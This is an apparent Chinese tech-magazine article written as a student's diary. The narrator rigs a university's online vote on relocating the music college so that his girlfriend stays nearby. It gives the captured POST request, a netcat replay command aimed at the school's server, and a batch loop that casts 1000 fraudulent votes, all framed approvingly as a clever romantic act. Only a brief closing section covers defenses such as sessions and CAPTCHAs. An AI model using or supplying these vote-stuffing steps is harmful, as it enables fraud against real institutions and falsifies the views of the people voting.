日記系列04：挽留愛情，我要“瘋”投 -電腦資料

    本系列前三篇：

    日記系列03：為了她，突破教室的封鎖線 /Article/200803/24732.html

    日記系列02：接近她，校網漏洞組合拳 /Article/200803/24731.html

    日記系列01：用ARP欺騙她/Article/200803/24730.html

    博弈主題：校園網絡安全

    本期 ：學生小雨

    個人專長：滲透技術

    技術難度：★★★☆☆

    重點知識：抓包技術、Cookies欺騙與SBD的使用

    校園網絡投票現在已經是征詢師生意見的一種主流方式了，所有的數據都通過計算機統(tǒng)計，貌似公平而有效，

日記系列04：挽留愛情，我要“瘋”投

    3月26日  天氣：

    無論如何，我都必須承認，愛情是神奇的，不管它降臨到了誰的身邊，都能夠讓你陶醉其中，顯然我現在也醉了。我深深的愛上了她的一切和這種稱之為戀愛的感覺。我喜歡坐在她身邊沉醉在她輕輕哼唱的歌聲中，我喜歡她那張圓圓笑臉上的可愛酒窩，我喜歡她那個小巧而標準的櫻桃嘴，我喜歡她大而靈動的眼睛，那個俏皮的鼻子，雪白如玉的皮膚……

    我承認，我是裝出來的無所謂，其實當我小心而謹慎的牽著她的手，帶她出現在我們學院的公共課上的時候，我能夠真實的感受到全系271名男同胞熾熱而嫉妒的發(fā)瘋的眼神。要知道在我們理工學院，女孩兒本來就如同熊貓一樣珍稀，而且大多數都長得比較抽象，可想而知這種強烈的對比是多么震撼的視覺沖擊，當然你也一定能夠想象到此時的我是多么的自鳴得意。

    上帝一定是一個開玩笑的高手，正在我剛剛感覺自己開始戀愛了的時候，學校卻突然宣布了一個消息，由于學校要擴大規(guī)模，因此包括音樂學院在內的幾個藝術類學院要選擇進行搬遷，而搬遷的地址選擇則有師生網絡投票決定。我完全不知道音樂學院的那群學生怎么想的，網絡投票結果中目前排名第一的竟然是搬遷到200公里以外的一個海邊郊縣，如果這個結果是最終結果，那么也就意味著，我和她剛剛起飛的愛情很可能轉眼就變成可憐的牛郎織女的故事。

    不行，這種情況絕不能發(fā)生，我必須想辦法改變結果，留下她，讓她留在我身邊，就留在我身邊的長安區(qū)！

    決定性的Cookies

    我打開學校的投票網站反復琢磨，思索著如何敲開這扇緊密的大門，如何才能夠留下她�？吹竭@個網頁是ASP編寫的，我一度想嘗試尋找漏洞注入進入數據庫直接修改數據，不過有了前幾次我挑釁式的攻擊，學校的網站安全性已經開始加強了，至少單憑幾款傻瓜軟件，已經不能夠完全敲開它的大門了，無奈我只好另辟蹊徑，從投票系統(tǒng)本身下手了。

    在投票網站中，音樂學院的四個遷址備選地都列在了上面，我嘗試性的對距離現在學校地址最近的“長安區(qū)”投了一票，在點擊提交選票后，瀏覽器很快彈出了一個對話框，（圖-1）提示我投票成功了。于是我再一次選擇“長安區(qū)”進行投票，此時系統(tǒng)再一次彈出了一個對話框，提示我已經投過一次票了。顯然投票系統(tǒng)加了一個簡單的防作弊功能。通常針對網絡投票防作弊主要有IP防作弊、Cookies防作弊和Session防作弊手段等。IP防作弊主要使用數據庫記錄電腦每次投票的IP地址，在每次投票過程中通過分析投票者的IP地址與以投票的數據庫IP地址對比，判斷是否已經進行過投票。而此時我注意到，學校投票的網址為http://www.edu.cn/vote/vote_xiaozhi.asp?id=39，網站在公網中。正因為學校的投票網址為公網網址，我斷定投票系統(tǒng)肯定不會是選擇IP防作弊手段，因為學校大多數投票的學生都是在教室機房和網吧進行投票的，而這些地方通常會公用一個公網IP，如果基于IP判斷，那么一個教室機房估計只能夠投一票，似乎Cookies驗證更為貼近現實一些。

    Cookies驗證是通過在每個投票的電腦中寫入一個對應IP的，且時間設為無限長的Cookies文件（用setCookies()函數）進行判斷的。但是一旦用戶關閉了瀏覽器的Cookies功能或將Cookies清空后再一次投票，這種驗證方法都將失效。于是我決定驗證一下，我首先將系統(tǒng)中的Cookies清空，然后重新打開IE瀏覽器，將“Internet選項”中的“隱私”設為“阻止所有Cookies”。修改完成后，我又一次進行了重復投票，而此時瀏覽器并沒有彈出重復投票的警告提示，而是順利的認為我投票成功了，顯然我的判斷是正確的，音樂學院采用的基于Cookie的驗證方法。

    批量處理的選票

    如果我有大量的空閑時間，并且不在乎手腕局部抽筋的話，此時我可以一直翻番在瀏覽器中重復選擇剛才的投票動作，用體力換來大量的“有效票”。但是這樣似乎并不符合 精神的本質，而且她如果知道我為了留下她點擊鼠標點到手抽筋，估計也會笑破肚子的，必須采用一個簡單易行的辦法，

電腦資料

    網絡投票判斷投票成功的條件，往往是根據投票系統(tǒng)接收到的回饋數據進行判斷的，根據這個特性，我決定調出WinsockExpert，重復一次剛才已經做過的投票動作，并對此次操作進行抓包。（圖2）根據WinsockExpert抓回的數據分析，我注意到其中一個數據包最后寫有“choice=137&Submit22.x=74&Submit22.y=31”這段代碼。隨后我選擇了投票中另外一個地區(qū)，重復投票抓包。根據最后的數據我發(fā)現“choice=137”是控制投票選項選擇的關鍵數據，而其他數據則沒有任何意義。

    分析出關鍵數據之后，我決定利用大名鼎鼎的網絡瑞士軍刀NetCat—NC完成批量投票的動作。首先我將對“長安區(qū)”的投票進行了抓包，之后將其中的

    POST /vote/deal.asp?id=39 HTTP/1.1

    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*

    Referer: http://www.edu.cn/vote/vote_xiaozhi.asp?id=39

    Accept-Language: zh-cn

    Content-Type: application/x-www-form-urlencoded

    UA-CPU: x86

    Accept-Encoding: gzip, deflate

    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)

    Host: su.ruc.edu.cn

    Content-Length: 46

    Connection: Keep-Alive

    Cache-Control: no-cache

    choice=137&Submit22.x=74&Submit22.y=31

    然后將上述內容復制粘貼到記事本中，并保存為Shuapiao.txt格式的文件。

    之后，我將Shuapiao.txt和NC保存在同一個目錄中，然后在DOS命令提示符下輸入nc toupiao.edu.cn 80

    雖然用NC直接發(fā)送數據省卻了許多環(huán)節(jié)，但是發(fā)送1000票需要連續(xù)點擊1000多次也是我無法忍受的，BAT批處理文件再一次成為了我制勝的武器。（圖3）

    @ECHO OFF

    SET /A counter=0

    :top

    SET /a counter=%counter%+1

    ECHO 已經刷了 %counter% 票

    nc toupiao.edu.cn 80

    if %counter% LSS 1000 GOTO :top

    ECHO Run complete

    這段BAT之所以如此復雜，除了NC沒有非常好的退出機制外，更重要的是，通過這段BAT命令，我可以精確的控制投票的每一個票數。畢竟只有1000多人的一個學院，如果出現上百萬的投票就太不現實。

    最后的時刻，我將TXT文本、NC和BAT文件復制在一個目錄中完成運行，二十分鐘后，我得到了1000票的完美結果。我希望技術此時能夠留住我的愛情……

    清理虛假的民意

    針對越來越多的網絡刷票，我們提供了幾個相對常見的防范辦法：

    Session技術

    與常用Cookiess防作弊方法基本一樣，通過將數據寫入一個對應電腦的Session，時間為無限長(相對來說,session比Cookiess安全，因為session是保存在服務器上的，而Cookiess是保存在客戶端上的)。

    驗證碼技術

    目前在投票前添加必須手工輸入的驗證碼也是較為流行的一種辦法，通過隨機產生的驗證碼，對于一些手段相對簡單的刷票工具和刷票方法，很容易就能夠實現穩(wěn)定而有成效的防范。

    戰(zhàn)書

    密碼為九宮格中央的數字

    答案：